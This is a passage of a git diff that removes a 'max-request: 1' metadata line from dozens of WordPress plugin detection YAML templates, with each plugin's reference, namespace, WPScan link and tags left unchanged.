@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/nextend-facebook-connect/
metadata:
- max-request: 1
plugin_namespace: nextend-facebook-connect
wpscan: https://wpscan.com/plugin/nextend-facebook-connect
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index b08876df04..953e4ab3d8 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/nextgen-gallery/
metadata:
- max-request: 1
plugin_namespace: nextgen-gallery
wpscan: https://wpscan.com/plugin/nextgen-gallery
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 3f68dffe06..92107fa69c 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ninja-forms/
metadata:
- max-request: 1
plugin_namespace: ninja-forms
wpscan: https://wpscan.com/plugin/ninja-forms
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 34f9bde1d6..5e1fe4ef5c 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ocean-extra/
metadata:
- max-request: 1
plugin_namespace: ocean-extra
wpscan: https://wpscan.com/plugin/ocean-extra
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index d9f645328f..74fb3e6010 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/official-facebook-pixel/
metadata:
- max-request: 1
plugin_namespace: official-facebook-pixel
wpscan: https://wpscan.com/plugin/official-facebook-pixel
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index 8a1196fc9f..b9f70ba555 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/one-click-demo-import/
metadata:
- max-request: 1
plugin_namespace: one-click-demo-import
wpscan: https://wpscan.com/plugin/one-click-demo-import
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 05025452b7..6486c02c9a 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/optinmonster/
metadata:
- max-request: 1
plugin_namespace: optinmonster
wpscan: https://wpscan.com/plugin/optinmonster
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 0bc823830f..c45ef4bf89 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/otter-blocks/
metadata:
- max-request: 1
plugin_namespace: otter-blocks
wpscan: https://wpscan.com/plugin/otter-blocks
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index dafe6974f6..3743307dbc 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/password-protected/
metadata:
- max-request: 1
plugin_namespace: password-protected
wpscan: https://wpscan.com/plugin/password-protected
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index ba05fb1e16..a4c6980041 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/pdf-embedder/
metadata:
- max-request: 1
plugin_namespace: pdf-embedder
wpscan: https://wpscan.com/plugin/pdf-embedder
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml
index 7fbeea5917..a224d85727 100644
--- a/http/technologies/wordpress/plugins/photo-gallery.yaml
+++ b/http/technologies/wordpress/plugins/photo-gallery.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/photo-gallery/
metadata:
- max-request: 1
plugin_namespace: photo-gallery
wpscan: https://wpscan.com/plugin/photo-gallery
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index 7f98d822a8..adf3387ddb 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/pixelyoursite/
metadata:
- max-request: 1
plugin_namespace: pixelyoursite
wpscan: https://wpscan.com/plugin/pixelyoursite
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index 89602f4264..eb6e1aaa5d 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/polylang/
metadata:
- max-request: 1
plugin_namespace: polylang
wpscan: https://wpscan.com/plugin/polylang
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index 2f6513ca42..b3c83cd0bf 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/popup-builder/
metadata:
- max-request: 1
plugin_namespace: popup-builder
wpscan: https://wpscan.com/plugin/popup-builder
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 982306b13c..96d8bd6aca 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/popup-maker/
metadata:
- max-request: 1
plugin_namespace: popup-maker
wpscan: https://wpscan.com/plugin/popup-maker
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index fdcac13b56..85955ac95e 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/post-smtp/
metadata:
- max-request: 1
plugin_namespace: post-smtp
wpscan: https://wpscan.com/plugin/post-smtp
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index 829edad042..56d2e4efcd 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/post-types-order/
metadata:
- max-request: 1
plugin_namespace: post-types-order
wpscan: https://wpscan.com/plugin/post-types-order
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index 975b63f5de..d9c6052cd7 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/premium-addons-for-elementor/
metadata:
- max-request: 1
plugin_namespace: premium-addons-for-elementor
wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index 5065659e82..afc1141e0c 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/pretty-link/
metadata:
- max-request: 1
plugin_namespace: pretty-link
wpscan: https://wpscan.com/plugin/pretty-link
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index 732ffbc4eb..d44add9ca6 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/really-simple-captcha/
metadata:
- max-request: 1
plugin_namespace: really-simple-captcha
wpscan: https://wpscan.com/plugin/really-simple-captcha
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 12dffeb534..20ba5c2e16 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/really-simple-ssl/
metadata:
- max-request: 1
plugin_namespace: really-simple-ssl
wpscan: https://wpscan.com/plugin/really-simple-ssl
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index ae0e76c4bb..cbcf3cf09d 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/redirection/
metadata:
- max-request: 1
plugin_namespace: redirection
wpscan: https://wpscan.com/plugin/redirection
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index b1718d1ccb..3311d42c94 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/redux-framework/
metadata:
- max-request: 1
plugin_namespace: redux-framework
wpscan: https://wpscan.com/plugin/redux-framework
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 7543ac1d55..46c1c22805 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/regenerate-thumbnails/
metadata:
- max-request: 1
plugin_namespace: regenerate-thumbnails
wpscan: https://wpscan.com/plugin/regenerate-thumbnails
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 4a29cecdb0..7c13b8d2a4 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/safe-svg/
metadata:
- max-request: 1
plugin_namespace: safe-svg
wpscan: https://wpscan.com/plugin/safe-svg
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index be281d91e6..53b30ba721 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/seo-by-rank-math/
metadata:
- max-request: 1
plugin_namespace: seo-by-rank-math
wpscan: https://wpscan.com/plugin/seo-by-rank-math
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 6bd95ec077..9555d7aebd 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/sg-cachepress/
metadata:
- max-request: 1
plugin_namespace: sg-cachepress
wpscan: https://wpscan.com/plugin/sg-cachepress
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 1fd64a5279..180266f448 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/sg-security/
metadata:
- max-request: 1
plugin_namespace: sg-security
wpscan: https://wpscan.com/plugin/sg-security
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 648ee176ce..656ad7dfe5 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/shortcodes-ultimate/
metadata:
- max-request: 1
plugin_namespace: shortcodes-ultimate
wpscan: https://wpscan.com/plugin/shortcodes-ultimate
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 7836d9554c..015fb97043 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/shortpixel-image-optimiser/
metadata:
- max-request: 1
plugin_namespace: shortpixel-image-optimiser
wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index ccd72e427a..1d5224b457 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/simple-custom-post-order/
metadata:
- max-request: 1
plugin_namespace: simple-custom-post-order
wpscan: https://wpscan.com/plugin/simple-custom-post-order
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index 3622b2c6b3..aafd6c6a38 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/siteguard/
metadata:
- max-request: 1
plugin_namespace: siteguard
wpscan: https://wpscan.com/plugin/siteguard
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index 9eff765d61..e10ab985da 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/siteorigin-panels/
metadata:
- max-request: 1
plugin_namespace: siteorigin-panels
wpscan: https://wpscan.com/plugin/siteorigin-panels
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index c856e1fa9e..9881b591ae 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/smart-slider-3/
metadata:
- max-request: 1
plugin_namespace: smart-slider-3
wpscan: https://wpscan.com/plugin/smart-slider-3
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 008440cc58..0480b4b0e6 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/so-widgets-bundle/
metadata:
- max-request: 1
plugin_namespace: so-widgets-bundle
wpscan: https://wpscan.com/plugin/so-widgets-bundle
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 410776862f..26d525386b 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
metadata:
- max-request: 1
plugin_namespace: stops-core-theme-and-plugin-updates
wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index f210a2a2f9..3920c5cf56 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/sucuri-scanner/
metadata:
- max-request: 1
plugin_namespace: sucuri-scanner
wpscan: https://wpscan.com/plugin/sucuri-scanner
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f1dd1bf150..f556786f5a 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/svg-support/
metadata:
- max-request: 1
plugin_namespace: svg-support
wpscan: https://wpscan.com/plugin/svg-support
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index a9ec913599..844e3d19a0 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/table-of-contents-plus/
metadata:
- max-request: 1
plugin_namespace: table-of-contents-plus
wpscan: https://wpscan.com/plugin/table-of-contents-plus
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index d38aeb0279..eb0f02f602 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/tablepress/
metadata:
- max-request: 1
plugin_namespace: tablepress
wpscan: https://wpscan.com/plugin/tablepress
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 07c43b9d80..755efd53fa 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/taxonomy-terms-order/
metadata:
- max-request: 1
plugin_namespace: taxonomy-terms-order
wpscan: https://wpscan.com/plugin/taxonomy-terms-order
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 83a849e11e..0403bb4e72 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/the-events-calendar/
metadata:
- max-request: 1
plugin_namespace: the-events-calendar
wpscan: https://wpscan.com/plugin/the-events-calendar
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index c6100637d9..cd2632ea05 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/themeisle-companion/
metadata:
- max-request: 1
plugin_namespace: themeisle-companion
wpscan: https://wpscan.com/plugin/themeisle-companion
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index 1f188b66c6..b5f8b822c7 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/tinymce-advanced/
metadata:
- max-request: 1
plugin_namespace: tinymce-advanced
wpscan: https://wpscan.com/plugin/tinymce-advanced
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 2c7b16cb44..85aaf7ff16 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/translatepress-multilingual/
metadata:
- max-request: 1
plugin_namespace: translatepress-multilingual
wpscan: https://wpscan.com/plugin/translatepress-multilingual
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 9d6afa8d3f..0af322b728 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
metadata:
- max-request: 1
plugin_namespace: ultimate-addons-for-gutenberg
wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index 48481fde3b..b7ad16e281 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/under-construction-page/
metadata:
- max-request: 1
plugin_namespace: under-construction-page
wpscan: https://wpscan.com/plugin/under-construction-page
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index b34d196268..10fd071b0b 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/updraftplus/
metadata:
- max-request: 1
plugin_namespace: updraftplus
wpscan: https://wpscan.com/plugin/updraftplus
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index abec174ec3..401b0e479f 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/use-any-font/
metadata:
- max-request: 1
plugin_namespace: use-any-font
wpscan: https://wpscan.com/plugin/use-any-font
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index e088ac07a6..6f95506748 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/user-role-editor/
metadata:
- max-request: 1
plugin_namespace: user-role-editor
wpscan: https://wpscan.com/plugin/user-role-editor
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 8b163200bf..4404f87aab 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/velvet-blues-update-urls/
metadata:
- max-request: 1
plugin_namespace: velvet-blues-update-urls
wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 2366a7dad7..8995434fce 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/w3-total-cache/
metadata:
- max-request: 1
plugin_namespace: w3-total-cache
wpscan: https://wpscan.com/plugin/w3-total-cache
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 71448e61e8..8175806cb8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/webp-converter-for-media/
metadata:
- max-request: 1
plugin_namespace: webp-converter-for-media
wpscan: https://wpscan.com/plugin/webp-converter-for-media
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index 717554b89f..db82bc7f43 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/webp-express/
metadata:
- max-request: 1
plugin_namespace: webp-express
wpscan: https://wpscan.com/plugin/webp-express
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index fba5c8b09c..03ddae57bc 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/widget-importer-exporter/
metadata:
- max-request: 1
plugin_namespace: widget-importer-exporter
wpscan: https://wpscan.com/plugin/widget-importer-exporter
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index 631202198e..d6449bb5bf 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woo-cart-abandonment-recovery/
metadata:
- max-request: 1
plugin_namespace: woo-cart-abandonment-recovery
